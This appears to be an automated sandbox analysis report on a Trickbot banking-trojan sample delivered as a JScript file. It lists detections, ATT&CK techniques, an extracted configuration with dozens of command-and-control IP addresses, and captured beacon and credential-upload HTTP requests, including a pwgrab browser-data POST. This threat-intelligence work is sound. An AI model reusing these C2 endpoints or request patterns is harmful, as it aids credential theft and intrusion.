Loading ...

Play interactive tourEdit tour

Analysis Report Monet.jse

Overview

General Information

Joe Sandbox Version:28.0.0
Analysis ID:93925
Start date:20.01.2020
Start time:14:10:45
Joe Sandbox Product:Cloud
Overall analysis duration:0h 18m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Monet.jse
Cookbook file name:default.jbs
Analysis system description:computer Native physical Machine for testing VM-aware malware (Office 2010 v14.0.6029, Java 1.8.0_65, Flash 20.0.0.267, Acrobat Reader 11.0.18, Internet Explorer 11, Chrome 55, Firefox 47)
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.spyw.evad.winJSE@20/7@4/8
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 125
  • Number of non-executed functions: 118
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .jse
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, igfxsrvc.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 8.248.119.254, 8.253.95.121, 8.248.129.254, 8.248.141.254, 8.248.131.254, 67.26.81.254, 8.253.95.120, 67.26.83.254, 8.253.95.249, 8.253.95.98, 8.248.121.254, 67.26.75.254, 8.253.207.108, 67.26.73.254, 8.248.125.254, 93.184.221.240, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Trickbot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation21Valid Accounts1Valid Accounts1Disabling Security Tools1Credential Dumping2System Time Discovery2Remote File Copy3Data from Local System1Data Encrypted1Uncommonly Used Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting21Application Shimming1Access Token Manipulation11Deobfuscate/Decode Files or Information1Credentials in Files1Security Software Discovery5Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExecution through API131Accessibility FeaturesProcess Injection32Scripting21Input CaptureFile and Directory Discovery4Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExploitation for Client Execution1System FirmwareApplication Shimming1File Deletion1Credentials in FilesSystem Information Discovery35Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line Interface2Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationQuery Registry1Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading1Brute ForceVirtualization/Sandbox Evasion3Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionProcess Discovery3Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionModify Registry1Bash HistoryApplication Window Discovery11Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessVirtualization/Sandbox Evasion3Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationAccess Token Manipulation11KeychainSystem Network Configuration Discovery11Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsProcess Injection32Private KeysSecurity Software DiscoveryReplication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe
Masquerade as Legitimate ApplicationRegsvr32New ServiceBypass User Account ControlDLL Side-Loading1Securityd MemoryPermission Groups DiscoveryPass the TicketMan in the BrowserAlternate Network MediumsCustom Command and Control ProtocolDisk Content Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: svchost.exe.284.18.memstrMalware Configuration Extractor: Trickbot {"C2 list": ["181.196.207.202:449", "82.146.62.520:443", "8.91.10.8:443", "129.134.18.23:449", "186.232.91.240:449", "5.182.210.226:443", "85.204.116.128:443", "185.62.188.34:443", "79.143.31.246:443", "93.189.46.122:443", "31.184.254.50:443", "195.123.217.226:443", "185.99.2.117:443", "104.168.96.113:443", "188.165.62.36:443", "5.182.210.246:443", "185.142.99.8:443", "185.252.144.135:443", "82.146.62.52:443", "212.109.220.111:443", "91.235.129.25:443", "5.182.210.109:443", "190.214.13.2:449", "181.140.173.186:449", "181.129.104.139:449", "181.113.28.146:449", "181.112.157.42:449", "170.84.78.224:449", "200.21.51.38:449", "46.174.235.36:449", "36.89.85.103:449", "181.129.134.18:449", "186.71.150.23:449", "131.161.253.190:449", "200.127.121.99:449", "114.8.133.71:449", "119.252.165.75:449", "121.100.19.18:449", "202.29.215.114:449", "180.180.216.177:449", "171.100.142.238:449"], "modules": ["networkDll", "pwgrab", "mcconf", "systeminfo"]}
Yara detected TrickbotShow sources
Source: Yara matchFile source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00065980 CryptAcquireContextW,14_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00065980 CryptAcquireContextW,18_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0007C2F0 CryptAcquireContextW,18_2_0007C2F0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00065980 CryptAcquireContextW,21_2_00065980
Source: C:\Windows\System32\svchost.exeCode function: 21_2_0007C2F0 CryptAcquireContextW,21_2_0007C2F0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008E1F4 CryptUnprotectData,wnsprintfA,wnsprintfA,36_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180096408 CryptUnprotectData,LocalFree,36_2_0000000180096408
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008C580 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_000000018008C580
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800966D0 RegQueryValueExW,VirtualAlloc,RegQueryValueExW,VirtualFree,lstrlenW,CryptUnprotectData,LocalFree,VirtualFree,36_2_00000001800966D0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800968A0 StrCpyNW,StrCatW,lstrlenW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,wnsprintfW,StrCmpW,36_2_00000001800968A0
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018008D428 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_000000018008D428
Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000000180093798 CryptUnprotectData,36_2_0000000180093798
Source: C:\Windows\System32\svchost.exeCode function: 36_2_000000018009790C CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,36_2_000000018009790C

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\svchost.exeCode function: 14_2_00061180 FindFirstFileW,FindNextFileW,FindClose,14_2_00061180
Source: C:\Windows\System32\svchost.exeCode function: 18_2_0006BD80 FindFirstFileW,FindNextFileW,18_2_0006BD80
Source: C:\Windows\System32\svchost.exeCode function: 18_2_00061180 FindFirstFileW,FindNextFileW,FindClose,18_2_00061180
Source: C:\Windows\System32\svchost.exeCode function: 18_2_000782C0 FindFirstFileW,FindNextFileW,18_2_000782C0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00061180 FindFirstFileW,FindNextFileW,FindClose,21_2_00061180
Enumerates the file systemShow sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\Jump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\taskschd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\CrashDumps\Jump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\bcryptprimitives.dllJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.0.40:49187 -> 181.129.104.139:449
Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.0.40:49189 -> 5.2.78.43:443
Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 185.62.189.249:447 -> 192.168.0.40:49193
Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.0.40:49203 -> 203.176.135.102:8082
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49203
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.40:49187 -> 181.129.104.139:449
Source: global trafficTCP traffic: 192.168.0.40:49193 -> 185.62.189.249:447
Source: global trafficTCP traffic: 192.168.0.40:49203 -> 203.176.135.102:8082
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36Accept-Language: de-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.195.237.14Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------CVWRWQYCSROXPZEUConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: 203.176.135.102:8082Content-Length: 301Cache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.195.237.14
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800796DC InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,GetLastError,InternetQueryOptionA,GetLastError,InternetSetOptionA,GetLastError,HttpSendRequestExA,GetLastError,InternetWriteFile,GetLastError,HttpEndRequestA,GetLastError,StrToIntExA,StrToIntExA,StrToIntExA,StrToIntExA,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,InternetCrackUrlA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_00000001800796DC
Downloads filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SBAZIX4A\Bx6ECqoJ2[1].txtJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/0/Windows%207%20x64%20SP1/1083/84.17.52.62/217C05512A13BF0D1975043DC440D43A0AD4D5BF9D7809375E0491B975D5B4A3/nfYREqCrC5seZ7lm5k4Fqwmud/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/user/SYSTEM/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/10/62/GDFUKAPEGYZAQTQ/1/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/1/P9VEk5oK3B7qmh1wSz/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global trafficHTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36Accept-Language: de-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.195.237.14Connection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: api.ipify.org
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/ HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=------Boundary019ABD5DUser-Agent: curl/7.67.0Content-Length: 141Host: 5.2.78.43
Urls found in memory or binary dataShow sources
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://103.84.238.3:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://103.94.122.254:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://103.94.122.254:8082lt
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://112.78.164.34:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://112.78.164.34:8082Vault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://164.68.96.155:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://164.68.96.155:443m
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://170.238.117.187:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://170.238.117.187:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://177.74.232.124:80
Source: wscript.exe, 00000000.00000002.55142443043.0000000002306000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.55143016342.0000000003E80000.00000004.00000001.sdmpString found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711
Source: wscript.exe, 00000000.00000002.55143060181.0000000003EA6000.00000004.00000001.sdmpString found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711bin
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://185.99.2.137:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://185.99.2.185:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://188.165.62.29:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://188.165.62.2:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://190.100.16.210:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://190.119.180.226:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://195.123.216.95:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://195.123.219.93:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://195.123.219.93:443x
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://203.176.135.102:8082
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmpString found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmpString found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/-4B97C760B13D
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://203.176.135.102:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://36.89.10
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://36.89.106.69:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://5.2.64.188:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://5.2.78.191:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://51.89.115.110:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://96.9.73.73:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://96.9.77.142:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmpString found in binary or memory: http://96.:80
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: svchost.exe, 00000012.00000002.56178566267.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
Source: svchost.exe, 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en1)
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Login Data.bak.36.drString found in binary or memory: http://www.google.com/favicon.ico
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmpString found in binary or memory: https://185.62.189.249:447/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/pwgrab64/
Source: svchost.exe, 00000012.00000003.56114318007.00000000003F7000.00000004.00000001.sdmpString found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmpString found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/
